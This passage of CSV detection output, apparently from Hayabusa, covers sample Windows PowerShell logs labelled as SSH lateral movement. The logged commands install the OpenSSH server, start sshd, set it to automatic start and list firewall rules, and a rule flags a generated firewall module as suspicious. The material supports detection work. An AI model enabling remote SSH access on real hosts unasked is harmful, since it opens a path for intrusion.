value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppxPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppXDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; 
value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-AppProvisionedPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-AppPackageProvisionedDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppPackageDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:02:14.627 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Cmdlet""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-WindowsCapability): ""Add-WindowsCapability"" ParameterBinding(Add-WindowsCapability): name=""Online""; value=""True"" ParameterBinding(Add-WindowsCapability): name=""Name""; value=""OpenSSH.Server~~~~0.0.1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Microsoft.Dism.Commands.ImageObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:16.478 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:16.480 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:37.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Write-Host 'Final result: 1';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""Final result: 1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:04:37.671 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
2021-04-22 19:19:29.476 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:29.479 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-Service sshd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:30.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-Service): ""Start-Service"" ParameterBinding(Start-Service): name=""Name""; value=""sshd""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:30.036 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:30.039 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:30.041 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:32.548 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:32.559 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Service -Name sshd -StartupType 'Automatic',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Service): ""Set-Service"" ParameterBinding(Set-Service): name=""Name""; value=""sshd"" ParameterBinding(Set-Service): name=""StartupType""; value=""Automatic""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:32.593 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:32.595 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:36.172 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:36.183 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule -Name *ssh*,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, 